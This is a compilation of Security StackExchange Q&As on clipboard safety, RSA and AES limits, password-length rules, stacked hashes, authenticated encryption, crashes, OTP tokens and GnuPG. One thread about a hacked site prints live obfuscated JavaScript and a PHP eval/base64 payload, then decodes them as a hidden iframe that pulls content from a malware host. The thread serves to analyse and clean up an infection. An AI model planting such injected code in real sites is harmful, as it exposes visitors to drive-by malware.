I see situations where you may have to input the same password more than once. You may type it in a text editor and copy it to clipboard, to paste it two or more times. In what scenarios this could be a bad idea?
The Windows clipboard is not secure. This is a quote from a MSDN article . The Clipboard can be used to store data, such as text and images. Because the Clipboard is shared by all active processes, it can be used to transfer data between them. This should probably apply to Linux machines as well. Is this a concern? No. For someone to exploit this, he would have to have malware on your machine capable of reading data from the clipboard. If he has the capability of getting malware on your machine, you have much bigger things to worry about as there are plenty of other stuff he can do, including keyloggers and the like.
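You can see this for yourself: any ordinary, unprivileged process can read the clipboard with no special permissions. A hypothetical Python sketch using the standard tkinter module (it needs a running desktop session):

import tkinter

root = tkinter.Tk()
root.withdraw()                           # no window needed
try:
    print("clipboard says:", root.clipboard_get())
except tkinter.TclError:
    print("clipboard is empty or not text")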
{ "source": [ "https://security.stackexchange.com/questions/33428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4980/" ] }
33,434
What is the maximum number of bytes for encrypting a plaintext message using RSA that is reasonably secure and also efficient and would AES be better for the same size in bytes? The encryption doesn't have to be public by the way, I'm just wondering if AES is just as good on a short message as it is on a large document. Basically the message or document would be sent encrypted but the key would never be made public. I guess that would also defeat the purpose of RSA but I've read a few times online that RSA is good for short messages and AES is good for long ones.
RSA, as defined by PKCS#1, encrypts "messages" of limited size. With the commonly used "v1.5 padding" and a 2048-bit RSA key, the maximum size of data which can be encrypted with RSA is 245 bytes. No more. When you "encrypt data with RSA", in practice, you are actually encrypting a random symmetric key with RSA, and then encrypting the data with a symmetric encryption algorithm, which is not limited in size. This is how it works in SSL, S/MIME, OpenPGP...

Regularly, some people suggest doing "RSA only" by splitting the input message into 245-byte chunks and encrypting each of them more or less separately. This is a bad idea because:

- There can be substantial weaknesses in how the data is split and then rebuilt. There is no well-studied standard for that.
- Each chunk, when encrypted, grows a bit (with a 2048-bit key, the 245 bytes of data become 256 bytes); when processing large amounts of data, the size overhead becomes significant.
- Decryption of a large message may become intolerably expensive.

When encrypting data with a symmetric block cipher, which uses blocks of n bits, some security concerns begin to appear when the amount of data encrypted with a single key comes close to 2^(n/2) blocks, i.e. n·2^(n/2) bits. With AES, n = 128 (AES-128, AES-192 and AES-256 all use 128-bit blocks). This means a limit of more than 250 million terabytes, which is sufficiently large not to be a problem. That's precisely why AES was defined with 128-bit blocks, instead of the more common (at that time) 64-bit blocks: so that data size is practically unlimited.
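For illustration, here is the hybrid pattern in a hypothetical Python sketch using the third-party cryptography package (real formats such as OpenPGP and TLS do the same thing with more metadata and more care; key sizes and algorithms below are just one reasonable choice):

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Recipient's key pair (normally the sender only has the public half).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

message = b"A" * 1_000_000            # far bigger than RSA could encrypt directly

# 1. Random symmetric key, wrapped with RSA-OAEP (fits easily in one RSA block).
session_key = AESGCM.generate_key(bit_length=256)
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# 2. Bulk data encrypted with the symmetric key.
nonce = os.urandom(12)
ciphertext = AESGCM(session_key).encrypt(nonce, message, None)

# Decryption reverses the two steps.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert AESGCM(recovered_key).decrypt(nonce, ciphertext, None) == message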
{ "source": [ "https://security.stackexchange.com/questions/33434", "https://security.stackexchange.com", "https://security.stackexchange.com/users/23786/" ] }
33,470
I have always wondered why so many websites have very firm restrictions on password length (exactly 8 characters, up to 8 characters, etc). These tend to be banks or other sites where I actually care about their security. I understand most people will pick short passwords like "password" and "123456" but are there technical reasons to force this? Using an application like 1Password, almost all my passwords are something like fx9@#^L;UyC4@mE3<P]uzt or other randomly generated long strings of unlikely to guess things. Are there specific reasons why websites enforce strict bounds on password lengths (more like 8 or 10, I understand why 100000000 might be a problem...)?
Take five chimpanzees. Put them in a big cage. Suspend some bananas from the roof of the cage. Provide the chimpanzees with a stepladder. BUT also add a proximity detector to the bananas, so that when a chimp goes near the banana, water hoses are triggered and the whole cage is thoroughly soaked. Soon, the chimps learn that the bananas and the stepladder are best ignored.

Now, remove one chimp, and replace it with a fresh one. That chimp knows nothing of the hoses. He sees the banana, notices the stepladder, and because he is a smart primate, he envisions himself stepping on the stepladder to reach the bananas. He then deftly grabs the stepladder... and the four other chimps spring on him and beat him squarely. He soon learns to ignore the stepladder.

Then, remove another chimp and replace it with a fresh one. The scenario occurs again; when he grabs the stepladder, he gets mauled by the four other chimps -- yes, including the previous "fresh" chimp. He has integrated the notion of "thou shalt not touch the stepladder".

Iterate. After some operations, you have five chimps who are ready to punch any chimp who would dare touch the stepladder -- and none of them knows why.

Originally, some developer, somewhere, was working on an old Unix system from the previous century, which used the old DES-based "crypt", actually a password hashing function derived from the DES block cipher. In that hashing function, only the first eight characters of the password are used (and only the low 7 bits of each character, as well). Subsequent characters are ignored. That's the banana. The Internet is full of chimpanzees.
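The original banana is still easy to observe. On a typical glibc-based Unix system, a two-character salt selects the legacy DES-based crypt(), and everything after the eighth character of the password is ignored (a hypothetical Python sketch; the crypt module is Unix-only and deprecated in recent Python releases):

import crypt

a = crypt.crypt("password-one", "ab")   # two-character salt -> legacy DES crypt
b = crypt.crypt("password-two", "ab")

print(a == b)   # True: only the first 8 characters ("password") are used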
{ "source": [ "https://security.stackexchange.com/questions/33470", "https://security.stackexchange.com", "https://security.stackexchange.com/users/19657/" ] }
33,531
I'm afraid I'll have tomatoes thrown at me for asking this old question, but here goes. After reading that cooking up your own password hash out of existing hashing functions is dangerous over and over again I still don't understand the logic. Here are some examples: md5(md5(salt) + bcrypt(password)) scrypt(bcrypt(password + salt)) sha1(md5(scrypt(password + md5(salt)))) The typical arguments against these go as follows: You're not a cryptographer! You've got no idea if these hashes are more secure. Leave it to the experts who know what they're doing. These add no extra security. Granted they don't improve the function as a hash (i.e. make it harder to reverse or find collisions etc.), but surely surely they don't make it worse as a hash? If they did then hackers would be able to re-hash standardly hashed passwords into these wacky hashes as they see fit and weaken the hash? I don't buy it. Second argument: Kerckoffs's principle : A cryptosystem should be secure even if everything about the system is known. Agreed. This is basically the motivation for not storing your passwords as plaintext in the first place. But if my response to the first criticism stands then these wacky hashes still function as secure hashes, and our system doesn't break Kerckoffs's principle anymore than it would with a standard hash. Here are two possible (and worthwhile, as far as I can see) advantages to using a "wacky" hash over a normal hash: Sure, your system should be secure if the attacker has the source code, but it's a very likely possibility that your attacker wont have access to your source code and probably won't be able to guess your wacky hash, making any attempt at a brute force impossible. (This one is the real motivation behind me asking this question) BCrypt is thought to be secure, hard for the CPU and GPU (great) but can be very fast with specialized hardware . SCrypt is said to be hard to bruteforce on CPUs, GPUs and currently available specialized hardward but is more recent and not trusted by the cryptographic community as much as BCrypt due to the lack of exposure it's had. But doesn't the hash BCrypt(SCrypt(password + salt)) get the best of both worlds? I appreciate that the passion/anger behind most rants against these home-brewed hashes comes from the average programmer's lack of knowledge of what makes a good hash, and a worry that encouraging this sort of wacky-hashing will inevitably end up with weak and useless hashes getting into production code. But If the wacky hash is carefully constructed out of solid and trusted hashes, are the gains in security not very valuable and real? Update I got a bunch of good answers on this, thanks. What I seemed to be overlooking in my assumptions was that, although combining hashes can't make it easier to crack the original password and therefore crack the constituent hashes, the combination of two or more secure hashes can - at least in principle - be weaker than any one of its inner hashes due to the unstudied and complex interactions between them. Meaning it could be possible to find some string that got past the wacky hash without necessarily breaking the hashes that made it up.
The fact that you need to ask this question is the answer itself - you do not know what is wrong with stacking these primitives, and therefore cannot possibly know what benefits or weaknesses there are. Let's do some analysis on each of the examples you gave: md5(md5(salt) + bcrypt(password)) I can see a few issues here. The first is that you're MD5'ing the salt. What benefit does this give? None. It adds complexity, and the salt is simply meant to be unique to prevent password collisions and pre-computation (e.g. rainbow table) attacks. Using MD5 here doesn't make any sense, and might actually weaken the scheme since MD5 has known trivial collisions. As such, there is a small possibility that introducing MD5 here might mean that two unique salts produce the same MD5 hash, resulting in an effectively duplicated salt. That's bad. Next, you use bcrypt on the password. Ok. Well, most bcrypt implementations require a salt internally, so this is already technically invalid. Let's say you know that, and you meant to say bcrypt(md5(salt), password) . This part is still falling to the weakness I described above, but it's not too shabby - remove the MD5 and it's a standard use of bcrypt. Finally, you MD5 the whole thing. Why are you doing this? What is the purpose? What benefit does it bring? As far as I can see, there is no benefit at all. On the detriment side, it adds more complexity. Since most bcrypt implementations use the $2a$rounds$salt$hash notation, you're going to have to write code to parse that so that you can extract the hash part and store the rest separately. You're also going to need an MD5 implementation, which was unnecessary. So, in terms of code footprint for potential attack vectors, you've gone from a simple bcrypt implementation, to a bcrypt implementation with custom parsing code, and MD5 implementation, and some glue code to stick it all together. For zero benefit, and a potential vulnerability in salt handling. Next one: scrypt(bcrypt(password + salt)) This one isn't too bad, but again you need some code to parse out the results of bcrypt into hash and salt / round count separately. In this case I'd guess that there is a slight benefit, because bcrypt and scrypt work in different ways for roughly the same goal, which would make it a little more difficult for an extremely well-funded attacker to build custom ASICs to break your scheme. But is that really necessary? Are you really going to hit a situation where a nation state will devote a few million dollars to just to break your hash? And, if that case ever arises, will it really bother the attacker to have to spend a few extra million to double their chip count? Another potential issue with combining bcrypt and scrypt like this is that there has been very little study into how the two interact. As such, we don't know if there are any weird cases that can cause problems. As a more obvious example, take the one time pad. We compute c=m^k for some message m and some equally long perfectly random key k , and we get perfect security. So let's do it twice , for even more security! That gives us c=m^k^k ... oh, wait, that just gives us m . So because we didn't take the time to properly understand how the internals of the system worked, we ended up with a real security vulnerability. Obviously it's more complicated in the case of KDFs, but the same principle applies. And finally: sha1(md5(scrypt(password + md5(salt)))) Again we're running into the MD5'ed salt issue. I'm also intrigued by MD5'ing the SHA1 hash. 
What possible benefit could that have, if you're already using a slow KDF like scrypt? The few nanoseconds it would take to compute those hashes pale in comparison to the hundreds of milliseconds it would take to compute the scrypt digest of the password. You're adding complexity for an absolutely irrelevant layer of "security", which is always a bad thing. Every line of code that you write is a potential vulnerability. Now remember that point I made at the start of my answer. If, at any point in this answer, you thought "oh yeah, I didn't think about that", then my point is proven. You're running into what I would describe as Dave's false maxim: If I add more crypto things, it will be more secure. This is a common trait among developers, and I once believed it too. It goes hand-in-hand with denial of other principles, such as Kerckhoffs's principle. Ultimately, you have to realise and accept that obscurity isn't a safety rail; it's a crutch for weak crypto. If your crypto is strong, it needs no crutch.
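For contrast, the boring, well-studied version of the job -- which is what this answer is arguing for -- is only a couple of lines (a hypothetical sketch using the third-party bcrypt package; the work factor is illustrative):

import bcrypt

# Hashing: bcrypt generates and embeds its own salt and work factor.
stored = bcrypt.hashpw(b"correct horse battery staple", bcrypt.gensalt(rounds=12))

# Verification.
print(bcrypt.checkpw(b"correct horse battery staple", stored))  # True
print(bcrypt.checkpw(b"wrong guess", stored))                   # False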
{ "source": [ "https://security.stackexchange.com/questions/33531", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24011/" ] }
33,569
I've been reading up on Authenticated Encryption with Associated Data . The linked RFC states: Authenticated encryption is a form of encryption that, in addition to providing confidentiality for the plaintext that is encrypted, provides a way to check its integrity and authenticity. My understanding is that simply encrypting the data, even using a symmetric shared key, with something like AES or 3DES should be sufficient to verify the data has not been tampered with in transit. If it had been, the message simply would not decrypt. So, why is a separate authentication necessary? In what situation would you need to have a separate authentication (even using plain HMAC with encryption)?
Encryption DOES NOT automatically protect the data against modification. For example, let's say we have a stream cipher that is simply a PRNG (random number generator), where the key is the seed. Encryption works by generating random numbers in sequence (the keystream) and exclusive-OR'ing them with the plaintext. If an attacker knows some plaintext and ciphertext bytes at a particular point, he can XOR them together to recover the keystream for those bytes. From there, he can simply pick some new plaintext bytes and XOR them with the keystream.

Often the attacker need not know the plaintext to achieve something. Let's take an example where an attacker simply needs to corrupt one particular field in a packet's internal data. He does not know what its value is, but he doesn't need to. Simply by replacing those bytes of ciphertext with random numbers, he has changed the plaintext. This is particularly interesting in block ciphers where padding is used, as it opens us up to padding oracle attacks. These attacks involve tweaking ciphertext in a way that alters the padding string, and observing the result. Other attacks such as BEAST and the Lucky Thirteen Attack involve modification of ciphertext in a similar way. These tend to rely on the fact that some implementations blindly decrypt data before performing any kind of integrity checks.

Additionally, it may be possible to re-send an encrypted packet, which might cause some behaviour on the client or server. An example of this might be a command to toggle the enabled state of the firewall. This is called a replay attack, and encryption on its own will not protect against it. In fact, integrity checks often don't fix this problem either.

There are, in fact, three primary properties that are desirable in a secure communications scheme:

- Confidentiality - The ability to prevent eavesdroppers from discovering the plaintext message, or information about the plaintext message (e.g. Hamming weight).
- Integrity - The ability to prevent an active attacker from modifying the message without the legitimate users noticing. This is usually provided via a Message Integrity Code (MIC).
- Authenticity - The ability to prove that a message was generated by a particular party, and prevent forgery of new messages. This is usually provided via a Message Authentication Code (MAC).

Note that authenticity automatically implies integrity. The fact that the MAC and MIC can be provided by a single appropriately chosen HMAC hash scheme (sometimes called a MAIC) in certain circumstances is completely incidental. The semantic difference between integrity and authenticity is a real one, in that you can have integrity without authenticity, and such a system may still present problems. The real distinction between integrity and authenticity is a tricky one to define, as Thomas Pornin pointed out to me in chat: There's a tricky definition point there. Integrity is that you get the "right data", but according to what notion of "right"? How comes the data from the attacker is not "right"? If you answer "because that's from the attacker, not from the right client" then you are doing authentication... It's a bit of a grey area, but either way we can all agree that authentication is important. An alternative to using a separate MAC / MIC is to use an authenticated block cipher mode, such as Galois/Counter Mode (GCM) or EAX mode.
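The bit-flipping attack on a stream cipher is easy to demonstrate. A hypothetical Python sketch with a toy PRNG keystream, like the example in the first paragraph (this is deliberately not a real cipher, and the message, key and positions are made up for illustration):

import random

def keystream_cipher(key: int, data: bytes) -> bytes:
    """Toy stream cipher: XOR with a PRNG keystream seeded by the key."""
    rng = random.Random(key)
    return bytes(b ^ rng.randrange(256) for b in data)

key = 1234
plaintext = b"PAY TO ALICE THE SUM OF $100"
ciphertext = keystream_cipher(key, plaintext)

# The attacker knows (or guesses) part of the plaintext and its position,
# never learns the key, yet can rewrite that part at will.
known, wanted = b"ALICE", b"MALLO"
pos = plaintext.index(known)              # assume the position is known or guessable
tampered = bytearray(ciphertext)
for i, (k, w) in enumerate(zip(known, wanted)):
    tampered[pos + i] ^= k ^ w

print(keystream_cipher(key, bytes(tampered)))
# b'PAY TO MALLO THE SUM OF $100' -- decrypts cleanly, integrity silently lost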
{ "source": [ "https://security.stackexchange.com/questions/33569", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24133/" ] }
33,604
If an application crashes, the program stops and there is nothing anyone can do about it, other than starting the program again. Crash is a bad behaviour in general and should be avoided, but why are they seen as security vulnerability?
It crashed because some input was not processed correctly. An attacker may try to find the code path that leads to the faulty procedure and attempt to execute arbitrary code through potential vulnerabilities. Crashes may give an attacker valuable information about the system and its internal details. Crashes may create temporary vulnerabilities or leave unprotected files (e.g. memory dumps) that may be exploited. (Thanks and a hat tip go to Ladadadada ) The application that crashes needs to be restarted, which obviously takes time (even with watchdogs and symmetric failover schemes). If an attacker replicates the conditions leading to the crash your service will suffer from prolonged outage ( Denial-of-service ) which means financial, reputation, and other losses.
{ "source": [ "https://security.stackexchange.com/questions/33604", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24121/" ] }
33,618
In my company, they don't allow accessing the company email or servers from outside the company network. To access the email from outside the network, you have to use: Username, password and a number generated from a small number generator. How does this verification method work?
There are several methods for such tokens. One of them is HOTP : the token and the server both share a common secret value, and a counter; from the secret and the current counter value, a one-time password can be generated (the token displays it, the server verifies that the entered password matches that which was expected). Some tokens also include the current date and time in the process, so that the one-time password is also limited in time: this supposes that the user pushes the button on the token and immediately enters the displayed password (the use of time prevents the user from generating some OTP in advance and writing them down on a piece of paper). The usual standard for that is TOTP .
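Both variants are short enough to write out in full. A hypothetical Python sketch of HOTP (RFC 4226) and TOTP (RFC 6238), using the common 6-digit, 30-second parameters; the shared secret below is just an example value:

import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, period: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP where the counter is the current time step."""
    return hotp(secret, int(time.time()) // period, digits)

shared_secret = b"12345678901234567890"   # provisioned into both the token and the server
print(totp(shared_secret))                # what the token would display right now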
{ "source": [ "https://security.stackexchange.com/questions/33618", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20337/" ] }
33,664
One of my sites has just been hacked as this code has been inserted into random(?) files and places within the files. Does anyone understand what it is trying to do? I would welcome anything that may assist me with finding out how it got on. Also, any suggestions on how to stop it re-appearing? Every time I delete it, it just comes back a short while later. <!--0242d5--><script type="text/javascript" language="javascript" > p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!7a!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!7a!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!70!7a!74!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!70!7a!74!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=62;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-485!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5--> ---- CODE in various places and end of files ---- <? 
#0242d5# eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw=="))); #/0242d5# ?> -- (within above tags [#0242d5# and #/0242d5#] is this code -that wont show properly with just pasting here) eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));
The first (in bold) code is actually this: Decoded with deobfuscatejavascript.com (function() { var pzt = document.createElement('iframe'); pzt.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php'; pzt.style.position = 'absolute'; pzt.style.border = '0'; pzt.style.height = '1px'; pzt.style.width = '1px'; pzt.style.left = '1px'; pzt.style.top = '1px'; if (!document.getElementById('pzt')) { document.write('<div id=\'pzt\'></div>'); document.getElementById('pzt').appendChild(pzt); } })(); Yes. This stuff does look malicious. It appears to be including files from another (probably also hacked) server in order to do -something-. The reason the code looks like this is because someone has attempted to obfuscate the code using some tools. Luckily its reversible. The code above is basically creating an 'invisible' iframe in the page and loading the URL from betterbailbonds.net. Kaspersky Internet Security Flags it as a malware serving site. The second chunk of code is base64 encoded and gzinflated decoded with: This tool echo " p=parseInt;ss=(123)?String.fromCharCode:0;asgq=\"28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!6@!78!62!6@!67!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!6@!78!62!6@!67!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!6@!78!62!6@!67!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b\".replace(/@/g,\"9\").split(\"!\");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=126;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s=\"\";if(zz)for(i=0;i-509!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}"; The above code then deobfuscates (had to do it manually this time because the online one threw errors??) 
again into something similar but with different variable names:

( function () {
    var ixbig = document.createElement('iframe');
    ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    ixbig.style.position = 'absolute';
    ixbig.style.border = '0';
    ixbig.style.height = '1px';
    ixbig.style.width = '1px';
    ixbig.style.left = '1px';
    ixbig.style.top = '1px';
    if (!document.getElementById('ixbig')) {
        document.write('<div id=\'ixbig\'></div>');
        document.getElementById('ixbig').appendChild(ixbig);
    }
})();

A quick google search shows that it appears you've been part of a wider attack with many people having similar code embedded in their pages. This also appears to be a duplicate of this stackexchange post Edit: I've just noticed that accessing this page flags it as malware via Kaspersky Internet Security. It's obviously aware of the script and defines it as HEUR:Trojan.Script.Generic
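For reference, the decoding that those online tools perform is only a few lines, because the obfuscated script spells it out itself: replace '@' with '9', split on '!', parse each token as hex and map it to a character. A hypothetical Python equivalent, demonstrated on a harmless sample string rather than on the real payload:

def decode_blob(blob: str) -> str:
    """Mirror of the JavaScript: .replace(/@/g,"9").split("!"), parseInt(x,16), fromCharCode."""
    tokens = blob.replace("@", "9").split("!")
    return "".join(chr(int(t, 16)) for t in tokens if t)

# Harmless example encoded the same way ("alert(1);"):
sample = "61!6c!65!72!74!28!31!2@!3b"
print(decode_blob(sample))   # alert(1);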
{ "source": [ "https://security.stackexchange.com/questions/33664", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24190/" ] }
33,752
If I encrypt the same file twice with GnuPG, using the same key, will I get the same result? or is it using some random/psudeo-random segment to improve security like rsynccrypto?
Generally speaking, no, encrypting the same file with the same key will not produce the same file, for three reasons:

1. The OpenPGP format (which GnuPG implements) uses hybrid encryption: a random, symmetric key is encrypted with the recipient's public key (of type RSA or ElGamal), and that symmetric key is itself used to encrypt the message body with a symmetric encryption algorithm. Hybrid encryption is used because asymmetric encryption algorithms are very limited in their range (e.g. a 2048-bit RSA key cannot encrypt more than 245 bytes in one go) and have high overhead (both in CPU and resulting message size). Since the symmetric key is not saved anywhere on the sender's side, a new random key will be created each time, and will be different with overwhelming probability.

2. Asymmetric encryption itself is randomized. E.g., with RSA, the padding includes random bytes. This is needed "in general", because the public key is public, so everybody knows it; if encryption was deterministic, attackers could run an exhaustive search on the message. This would not be an issue in the specific case of OpenPGP (the message is a random key, large enough to defeat exhaustive search on its own), but standards for RSA or ElGamal have a larger scope and include random padding.

3. When doing the symmetric encryption itself, a random IV is used, and will be different (with overwhelming probability) for each invocation. See section 5.7 for details.

The third point also applies when doing password-based encryption (encryption is done with a password, not with a recipient's public key). Password-based encryption also adds a fourth randomization, which is the salt in the password-to-key transform.
{ "source": [ "https://security.stackexchange.com/questions/33752", "https://security.stackexchange.com", "https://security.stackexchange.com/users/13660/" ] }
33,768
